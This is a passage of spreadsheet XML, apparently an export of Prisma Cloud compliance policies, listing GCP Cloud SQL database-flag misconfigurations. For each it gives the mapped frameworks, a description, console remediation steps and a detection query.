          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-sql-instances-list' AND json.rule = settings.ipConfiguration.authorizedNetworks[?any(value contains 0.0.0.0/0 or value contains ::/0)] exists</t>
        </is>
      </c>
      <c r="AA2972" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2972" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2972" t="inlineStr">
        <is>
          <t>PC-GCP-SQL-87</t>
        </is>
      </c>
      <c r="AD2972" t="b">
        <v>1</v>
      </c>
      <c r="AE2972" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2972" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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2" t="inlineStr">
        <is>
          <t>121ce47c-5c37-455f-b7b6-9dc967111f5d</t>
        </is>
      </c>
      <c r="AI2972" t="inlineStr">
        <is>
          <t>fd911a24-b41a-48ff-88fc-df1492b084e0</t>
        </is>
      </c>
      <c r="AJ2972" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2972" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2973">
      <c r="A2973" t="inlineStr">
        <is>
          <t>ISO/IEC 27002:2013, CSA CCM v.4.0.6, jneytchev-fedramp-low, Brazilian Data Protection Law (LGPD), Sarbanes Oxley Act (SOX), APRA (CPS 234) Information Security, RBI Baseline Cyber Security and Resilience Requirements, PCI DSS v4.0, ISO/IEC 27017:2015, kashan ACSC Information Security Manual (ISM), Fedramp (Moderate), Secure Controls Framework (SCF) - 2024.2, kfirdaus AWS Account-CS, ISO/IEC 27002:2013, Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, ITSG-33, CIS Controls v7.1, CSA CCM v.4.0.1, ISO 27002:2022, APRA (CPS 234) Information Security, ISO/IEC 27017:2015, PCI DSS v3.2.1, CSA CCM v.4.0.1, ISO/IEC 27017:2015, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, APRA (CPS 234) Information Security, kashan ACSC Information Security Manual (ISM), CIS Controls v8, PCI DSS v4.0, ISO/IEC 27001:2022, HITRUST v.9.4.2 [Deprecated], ISO 27002:2022, TX-RAMP Level 1, NIST SP 800-171 Revision 2, NIST SP 800-171 Revision 3, CRI Profile v1.2.1, CDC NIST 800-53 Rev4, TX-RAMP Level 2, Fedramp (Moderate), NIST 800-53 Rev 5, NIST 800-53 Rev 5, HITRUST v.9.4.2 [Deprecated], NIST 800-53 Rev4, Fedramp (Low), ACSC Information Security Manual (ISM), Fedramp (Low), CSA CCM v4.0.12, Brazilian Data Protection Law (LGPD), CSA CCM v.4.0.1, jneytchev-fedramp-low, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), CSA CCM v.4.0.1, CIS Controls v8.1, Insurance Regulatory And Development Authority Of India, kfirdaus AWS Account-CS, CRI Profile v2.0, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, SOC 2, NIST CSF v2.0, APRA (CPS 234) Information Security, CIS v1.1.0 (GCP), NIST CSF, CDC NIST 800-53 Rev4, Copy of ACSC Information Security Manual (ISM)-clone, Secure Controls Framework (SCF) - 2022.2.1, PCI DSS v4.0, Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, FFIEC, PCI DSS v4.0, NIST SP 800-171 Revision 3, Rehan, ISO/IEC 27002:2013, CIS Controls v8.1, CSA CCM v4.0.12, DORA, ACSC Information Security Manual (ISM), Copy of CIS Controls v8, PCI DSS v3.2.1, Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST SP 800-172, CIS v1.2.0 (GCP), NIST 800-53 Rev4, Copy of ACSC Information Security Manual (ISM)-clone</t>
        </is>
      </c>
      <c r="B2973" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2973" s="2" t="inlineStr"/>
      <c r="D2973" t="inlineStr"/>
      <c r="E2973" t="inlineStr"/>
      <c r="F2973" t="inlineStr"/>
      <c r="G2973" t="b">
        <v>1</v>
      </c>
      <c r="H29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3" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2973" t="inlineStr">
        <is>
          <t>gcloud-sql</t>
        </is>
      </c>
      <c r="K2973" t="inlineStr">
        <is>
          <t>GCP PostgreSQL instance database flag log_lock_waits is disabled</t>
        </is>
      </c>
      <c r="L2973" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2973" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2973" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2973" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2973" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2973" t="inlineStr">
        <is>
          <t>Guidelines for Database Systems</t>
        </is>
      </c>
      <c r="R2973" t="inlineStr">
        <is>
          <t>ISM-1537</t>
        </is>
      </c>
      <c r="S2973" t="inlineStr"/>
      <c r="T2973" t="b">
        <v>0</v>
      </c>
      <c r="U2973" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2973" t="inlineStr">
        <is>
          <t>gcloud-sql-instances-list</t>
        </is>
      </c>
      <c r="W2973" t="inlineStr">
        <is>
          <t>This policy identifies PostgreSQL database instances in which database flag log_lock_waits is not set. Enabling the log_lock_waits flag can be used to identify poor performance due to locking delays or if a specially-crafted SQL is attempting to starve resources through holding locks for excessive amounts of time.</t>
        </is>
      </c>
      <c r="X2973" t="inlineStr">
        <is>
          <t>1. Log in to GCP console
2. Navigate SQL Instances page
3. Click on reported PostgreSQL instance
4. Click EDIT
NOTE: If the instance is stopped, You need to START instance first to edit the configurations, then Click on EDIT.
5. If the flag has not been set on the instance, 
Under 'Configuration options', click on 'Add item' in 'Flags' section, choose the flag 'log_lock_waits' from the drop-down menu and set the value as 'On'
OR
If the flag has been set to off, Under 'Configuration options', In 'Flags' section choose the flag 'log_lock_waits' and set the value as 'On'
6. Click Save 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-5
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-5</t>
        </is>
      </c>
      <c r="Y2973" t="inlineStr"/>
      <c r="Z2973" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-sql-instances-list' AND json.rule = "databaseVersion contains POSTGRES and (settings.databaseFlags[?(@.name=='log_lock_waits')] does not exist or settings.databaseFlags[?(@.name=='log_lock_waits')].value equals off)"
{"category":"General","resourceTypes":["google_sql_database_instance"]}</t>
        </is>
      </c>
      <c r="AA2973" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2973" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2973" t="inlineStr">
        <is>
          <t>PC-GCP-SQL-529-CKV_GCP_54</t>
        </is>
      </c>
      <c r="AD2973" t="b">
        <v>1</v>
      </c>
      <c r="AE2973" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2973" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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3" t="inlineStr">
        <is>
          <t>9570d08f-1795-493f-b88d-7a7a68078ff6</t>
        </is>
      </c>
      <c r="AI2973" t="inlineStr">
        <is>
          <t>2a940029-8a0d-4798-b312-13d26783b43a</t>
        </is>
      </c>
      <c r="AJ2973" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2973" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2974">
      <c r="A2974" t="inlineStr">
        <is>
          <t>CSA CCM v.4.0.6, Sarbanes Oxley Act (SOX), RBI Baseline Cyber Security and Resilience Requirements, PCI DSS v4.0, kashan ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2024.2, kfirdaus AWS Account-CS, Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, ITSG-33, CIS Controls v7.1, ISO 27002:2022, New Zealand Information Security Manual (NZISM v3.4), GDPR, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, CIS v3.0.0 (GCP) Level 2, CIS v2.0.0 (GCP) Level 2, kashan ACSC Information Security Manual (ISM), CIS Controls v8, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), PCI DSS v4.0, ISO/IEC 27001:2022, ISO 27002:2022, TX-RAMP Level 1, CRI Profile v1.2.1, CIS v1.2.0 (GCP), TX-RAMP Level 2, ACSC Information Security Manual (ISM), CSA CCM v4.0.12, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), CIS Controls v8.1, Insurance Regulatory And Development Authority Of India, kfirdaus AWS Account-CS, CRI Profile v2.0, Copy of New Zealand Information Security Manual (NZISM v3.4), SOC 2, NIST CSF v2.0, Copy of ACSC Information Security Manual (ISM)-clone, Secure Controls Framework (SCF) - 2022.2.1, PCI DSS v4.0, Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, FFIEC, PCI DSS v4.0, CIS Controls v8.1, CSA CCM v4.0.12, DORA, ACSC Information Security Manual (ISM), Copy of CIS Controls v8, CIS v1.3.0 (GCP), Copy of ACSC Information Security Manual (ISM)-clone</t>
        </is>
      </c>
      <c r="B2974" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2974" s="2" t="inlineStr"/>
      <c r="D2974" t="inlineStr"/>
      <c r="E2974" t="inlineStr"/>
      <c r="F2974" t="inlineStr"/>
      <c r="G2974" t="b">
        <v>0</v>
      </c>
      <c r="H29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4" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2974" t="inlineStr">
        <is>
          <t>gcloud-sql</t>
        </is>
      </c>
      <c r="K2974" t="inlineStr">
        <is>
          <t>GCP PostgreSQL instance database flag log_statement is not set appropriately</t>
        </is>
      </c>
      <c r="L2974" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2974" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2974" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2974" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2974" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2974" t="inlineStr">
        <is>
          <t>Guidelines for Database Systems</t>
        </is>
      </c>
      <c r="R2974" t="inlineStr">
        <is>
          <t>ISM-1537</t>
        </is>
      </c>
      <c r="S2974" t="inlineStr"/>
      <c r="T2974" t="b">
        <v>0</v>
      </c>
      <c r="U2974" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2974" t="inlineStr">
        <is>
          <t>gcloud-sql-instances-list</t>
        </is>
      </c>
      <c r="W2974" t="inlineStr">
        <is>
          <t>This policy identifies PostgreSQL database instances in which database flag log_statement is not set appropriately. If log_statement is not set to a correct value may lead to too many statements or too few statements. Setting log_statement to align with your organization's security and logging policies facilitates later auditing and review of database activities. It is recommended to choose an appropriate value (ddl or mod) for the flag log_statement.</t>
        </is>
      </c>
      <c r="X2974" t="inlineStr">
        <is>
          <t>1. Log in to GCP console
2. Navigate SQL Instances page
3. Click on reported PostgreSQL instance
4. Click EDIT
5. If the flag has not been set on the instance, 
Under 'Customize your instance', click on 'ADD FLAG' in 'Flags' section, choose the flag 'log_statement' from the drop-down menu and set the value as ddl or mod
OR
If the flag has been set to other than ddl or mod, Under 'Customize your instance', In 'Flags' section choose the flag 'log_statement' and set the value as ddl or mod
6. Click on 'DONE' and then 'SAVE'</t>
        </is>
      </c>
      <c r="Y2974" t="inlineStr"/>
      <c r="Z2974" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-sql-instances-list' AND json.rule = state equals RUNNABLE and databaseVersion contains POSTGRES and ( settings.databaseFlags[?any( name equals "log_statement" )] does not exist or settings.databaseFlags[?any( name equals "log_statement" and value equals "all" or value equals "none" )] exists)</t>
        </is>
      </c>
      <c r="AA2974" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2974" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2974" t="inlineStr">
        <is>
          <t>PC-GCP-SQL-750</t>
        </is>
      </c>
      <c r="AD2974" t="b">
        <v>1</v>
      </c>
      <c r="AE2974" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2974" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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4" t="inlineStr">
        <is>
          <t>97eeb17b-4797-4876-8980-2e3f615ec5d8</t>
        </is>
      </c>
      <c r="AI2974" t="inlineStr">
        <is>
          <t>a446929a-da2c-494c-b4b9-9e68fec1c6ce</t>
        </is>
      </c>
      <c r="AJ2974" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2974" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2975">
      <c r="A2975" t="inlineStr">
        <is>
          <t>ISO/IEC 27002:2013, ACSC Information Security Manual (ISM), kfirdaus AWS Account-CS, Brazilian Data Protection Law (LGPD), Sarbanes Oxley Act (SOX), APRA (CPS 234) Information Security, ISO/IEC 27017:2015, Secure Controls Framework (SCF) - 2024.2, kfirdaus AWS Account-CS, ISO/IEC 27002:2013, CSA CCM v.4.0.1, Rehan, APRA (CPS 234) Information Security, ISO/IEC 27017:2015, PCI DSS v3.2.1, CSA CCM v.4.0.1, ISO/IEC 27017:2015, RBI Baseline Cyber Security and Resilience Requirements, Copy of CIS Controls v8, kashan ACSC Information Security Manual (ISM), Copy of ACSC Information Security Manual (ISM)-clone, CIS Controls v8, HITRUST v.9.4.2 [Deprecated], NIST SP 800-171 Revision 2, kashan ACSC Information Security Manual (ISM), CIS v3.0.0 (GCP) Level 1, HITRUST v.9.4.2 [Deprecated], Brazilian Data Protection Law (LGPD), CSA CCM v.4.0.1, CIS v1.2.0 (GCP), CIS v2.0.0 (GCP) Level 1, CSA CCM v.4.0.1, CIS v1.1.0 (GCP), APRA (CPS 234) Information Security, ISO/IEC 27002:2013, NIST CSF, Copy of ACSC Information Security Manual (ISM)-clone, Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27002:2013, CIS Controls v8.1, ACSC Information Security Manual (ISM), CIS v1.3.0 (GCP), PCI DSS v3.2.1, CIS Controls v7.1, Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST SP 800-172</t>
        </is>
      </c>
      <c r="B2975" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2975" s="2" t="inlineStr"/>
      <c r="D2975" t="inlineStr"/>
      <c r="E2975" t="inlineStr"/>
      <c r="F2975" t="inlineStr"/>
      <c r="G2975" t="b">
        <v>1</v>
      </c>
      <c r="H29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5" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2975" t="inlineStr">
        <is>
          <t>gcloud-sql</t>
        </is>
      </c>
      <c r="K2975" t="inlineStr">
        <is>
          <t>GCP MySQL instance with local_infile database flag is not disabled</t>
        </is>
      </c>
      <c r="L2975" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2975" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2975" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2975" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2975" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2975" t="inlineStr">
        <is>
          <t>Guidelines for Database Systems</t>
        </is>
      </c>
      <c r="R2975" t="inlineStr">
        <is>
          <t>ISM-1246</t>
        </is>
      </c>
      <c r="S2975" t="inlineStr"/>
      <c r="T2975" t="b">
        <v>0</v>
      </c>
      <c r="U2975" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2975" t="inlineStr">
        <is>
          <t>gcloud-sql-instances-list</t>
        </is>
      </c>
      <c r="W2975" t="inlineStr">
        <is>
          <t>This policy identifies MySQL instances in which local_infile database flag is not disabled. The local_infile flag controls the server-side LOCAL capability for LOAD DATA statements. Based on the settings in local_infile server refuses or permits local data loading by clients. Disabling the local_infile flag setting, would disable the local data loading by clients that have LOCAL enabled on the client side.</t>
        </is>
      </c>
      <c r="X2975" t="inlineStr">
        <is>
          <t>1. Login to GCP Console
2. Navigate to SQL
3. Select the MySQL instance for which you want to enable the database flag from the list
4. Click 'Edit'
NOTE: If the instance is stopped, You need to START instance first to edit the configurations, then Click on EDIT.
5. Go to the 'Flags' section under 'Configuration options'
6. Click 'Add item', choose the flag 'local_infile' from the drop-down menu and set the value to 'Off'
OR
If 'local_infile' database flag is already set to 'On', from the drop-down menu set the value to 'Off'
7. Click on 'Save' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-1
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-1</t>
        </is>
      </c>
      <c r="Y2975" t="inlineStr"/>
      <c r="Z2975" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-sql-instances-list' AND json.rule = "databaseVersion contains MYSQL and (settings.databaseFlags[?(@.name=='local_infile')] does not exist or settings.databaseFlags[?(@.name=='local_infile')].value equals on)"
{"category":"General","resourceTypes":["google_sql_database_instance"]}</t>
        </is>
      </c>
      <c r="AA2975" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2975" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2975" t="inlineStr">
        <is>
          <t>PC-GCP-SQL-533-CKV_GCP_50</t>
        </is>
      </c>
      <c r="AD2975" t="b">
        <v>1</v>
      </c>
      <c r="AE2975" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2975" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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5" t="inlineStr">
        <is>
          <t>558185cd-8704-4709-8bea-e6c692f26d00</t>
        </is>
      </c>
      <c r="AI2975" t="inlineStr">
        <is>
          <t>a063c6eb-ae91-4f80-9756-20b070a5733c</t>
        </is>
      </c>
      <c r="AJ2975" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2975" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2976">
      <c r="A2976" t="inlineStr">
        <is>
          <t>ISO/IEC 27001:2022, RBI Baseline Cyber Security and Resilience Requirements, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Secure Controls Framework (SCF) - 2024.2, CIS Controls v8.1, ISO 27002:2022, kfirdaus AWS Account-CS, CIS v2.0.0 (GCP) Level 1, ISO/IEC 27001:2022, ISO 27002:2022, New Zealand Information Security Manual (NZISM v3.4), CIS v3.0.0 (GCP) Level 1, ISO 27002:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), kashan ACSC Information Security Manual (ISM), CIS v1.3.0 (GCP), CIS Controls v8, CIS v1.2.0 (GCP), ISO/IEC 27001:2022, Copy of New Zealand Information Security Manual (NZISM v3.4), CIS Controls v7.1, Copy of ACSC Information Security Manual (ISM)-clone, Secure Controls Framework (SCF) - 2022.2.1, ISO 27002:2022, Copy of CIS Controls v8, ACSC Information Security Manual (ISM), Sarbanes Oxley Act (SOX), ISO/IEC 27001:2022</t>
        </is>
      </c>
      <c r="B2976" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2976" s="2" t="inlineStr"/>
      <c r="D2976" t="inlineStr"/>
      <c r="E2976" t="inlineStr"/>
      <c r="F2976" t="inlineStr"/>
      <c r="G2976" t="b">
        <v>1</v>
      </c>
      <c r="H29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6" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2976" t="inlineStr">
        <is>
          <t>gcloud-sql</t>
        </is>
      </c>
      <c r="K2976" t="inlineStr">
        <is>
          <t>GCP MySQL instance database flag skip_show_database is not set to on</t>
        </is>
      </c>
      <c r="L2976" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2976" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2976" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2976" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2976" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2976" t="inlineStr">
        <is>
          <t>CIS Control 3</t>
        </is>
      </c>
      <c r="R2976" t="inlineStr">
        <is>
          <t>3.3</t>
        </is>
      </c>
      <c r="S2976" t="inlineStr"/>
      <c r="T2976" t="b">
        <v>0</v>
      </c>
      <c r="U2976" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2976" t="inlineStr">
        <is>
          <t>gcloud-sql-instances-list</t>
        </is>
      </c>
      <c r="W2976" t="inlineStr">
        <is>
          <t>This policy identifies Mysql database instances in which database flag skip_show_database is not set to on. This prevents people from using the SHOW DATABASES statement if they do not have the SHOW DATABASES privilege. This can improve security if you have concerns about users being able to see databases belonging to other users. It is recommended to set skip_show_database to on.</t>
        </is>
      </c>
      <c r="X2976" t="inlineStr">
        <is>
          <t>1. Log in to GCP console
2. Navigate SQL Instances page
3. Click on reported MYSQL instance
4. Click on 'EDIT'
NOTE: If the instance is stopped, You need to START instance first to edit the configurations, then Click on EDIT.
5. If the flag has not been set on the instance, 
Under 'Customize your instance', click on 'ADD FLAG' in 'Flags' section, choose the flag 'skip_show_database' from the drop-down menu and set the value as 'on'
OR
If the flag has been set to off, Under 'Customize your instance', In 'Flags' section choose the flag 'skip_show_database' and set the value as 'on', Click on DONE
6. Click on 'DONE' and then 'SAVE' and if popup window appears, select 'SAVE AND RESTART'</t>
        </is>
      </c>
      <c r="Y2976" t="inlineStr"/>
      <c r="Z2976" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-sql-instances-list' AND json.rule = state equals RUNNABLE and databaseVersion contains MYSQL and (settings.databaseFlags[*].name does not contain skip_show_database or settings.databaseFlags[?any(name contains skip_show_database and value does not contain on)] exists)</t>
        </is>
      </c>
      <c r="AA2976" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2976" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2976" t="inlineStr">
        <is>
          <t>PC-GCP-SQL-741</t>
        </is>
      </c>
      <c r="AD2976" t="b">
        <v>1</v>
      </c>
      <c r="AE2976" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2976" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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6" t="inlineStr">
        <is>
          <t>b0faaf71-3c22-499c-983e-ef51ced2c8a3</t>
        </is>
      </c>
      <c r="AI2976" t="inlineStr">
        <is>
          <t>25232585-e11e-4826-a7ad-93cc00d543da</t>
        </is>
      </c>
      <c r="AJ2976" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2976" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2977">
      <c r="A2977" t="inlineStr">
        <is>
          <t>Copy of CIS Controls v8, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), NYDFS 23 CRR-NY 500.0, kashan ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2024.2, kfirdaus AWS Account-CS, CIS v1.3.0 (GCP), CIS v2.0.0 (GCP) Level 1, PCI DSS v4.0, ITSG-33, New Zealand Information Security Manual (NZISM v3.4), PCI DSS v4.0, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS v3.0.0 (GCP) Level 1, kashan ACSC Information Security Manual (ISM), TX-RAMP Level 1, CIS Controls v7.1, Insurance Regulatory And Development Authority Of India, CIS Controls v8.1, ITSG-33, ISO 27002:2022, CIS Controls v8, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), RBI Baseline Cyber Security and Resilience Requirements, ACSC Information Security Manual (ISM), PCI DSS v4.0, TX-RAMP Level 2, kfirdaus AWS Account-CS, FFIEC, Copy of New Zealand Information Security Manual (NZISM v3.4), CIS v1.2.0 (GCP), Copy of ACSC Information Security Manual (ISM)-clone, Secure Controls Framework (SCF) - 2022.2.1, TX-RAMP Level 1, ISO/IEC 27001:2022, ACSC Information Security Manual (ISM), Sarbanes Oxley Act (SOX), TX-RAMP Level 2, Copy of ACSC Information Security Manual (ISM)-clone</t>
        </is>
      </c>
      <c r="B2977" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2977" s="2" t="inlineStr"/>
      <c r="D2977" t="inlineStr"/>
      <c r="E2977" t="inlineStr"/>
      <c r="F2977" t="inlineStr"/>
      <c r="G2977" t="b">
        <v>1</v>
      </c>
      <c r="H29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7" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2977" t="inlineStr">
        <is>
          <t>gcloud-sql</t>
        </is>
      </c>
      <c r="K2977" t="inlineStr">
        <is>
          <t>GCP SQL server instance database flag remote access is not set to off</t>
        </is>
      </c>
      <c r="L2977" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2977" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2977" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2977" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2977" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2977" t="inlineStr">
        <is>
          <t>Guidelines for Database Systems</t>
        </is>
      </c>
      <c r="R2977" t="inlineStr">
        <is>
          <t>ISM-1537</t>
        </is>
      </c>
      <c r="S2977" t="inlineStr"/>
      <c r="T2977" t="b">
        <v>0</v>
      </c>
      <c r="U2977" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2977" t="inlineStr">
        <is>
          <t>gcloud-sql-instances-list</t>
        </is>
      </c>
      <c r="W2977" t="inlineStr">
        <is>
          <t>This policy identifies GCP SQL server instances for which database flag remote access is not set to off. The remote access option controls the execution of stored procedures from local or remote servers on which instances of SQL Server are running. 'Remote access' functionality can be abused to launch a Denial-of-Service (DoS) attack on remote servers by off-loading query processing to a target. It is recommended to set the remote access database flag for SQL Server instance to off.</t>
        </is>
      </c>
      <c r="X2977" t="inlineStr">
        <is>
          <t>1. Log in to GCP console
2. Navigate SQL Instances page
3. Click on reported SQL server instance
4. Click on EDIT
5. If the flag has not been set on the instance, 
Under 'Customize your instance' section, go to 'Flags and parameters', click on 'ADD FLAG' in 'New database flag' section, choose the flag 'remote access' from the drop-down menu and set the value as 'off'
OR
If the flag has been set to other than off, Under 'Flags and parameters', choose the flag 'remote access' and set the value as 'off'
6. Click on DONE
7. Click on SAVE</t>
        </is>
      </c>
      <c r="Y2977" t="inlineStr"/>
      <c r="Z2977" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-sql-instances-list' AND json.rule = 'databaseVersion contains SQLSERVER and state equals RUNNABLE and (settings.databaseFlags[*].name does not contain "remote access" or settings.databaseFlags[?any(name contains "remote access" and value contains on)] exists)'</t>
        </is>
      </c>
      <c r="AA2977" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2977" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2977" t="inlineStr">
        <is>
          <t>PC-GCP-SQL-769</t>
        </is>
      </c>
      <c r="AD2977" t="b">
        <v>1</v>
      </c>
      <c r="AE2977" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2977" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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7" t="inlineStr">
        <is>
          <t>eabe52e1-e2bc-405c-b470-d609d29040ad</t>
        </is>
      </c>
      <c r="AI2977" t="inlineStr">
        <is>
          <t>61672b30-729e-47df-9762-6991b23b59e4</t>
        </is>
      </c>
      <c r="AJ2977" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2977" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2978">
      <c r="A2978" t="inlineStr">
        <is>
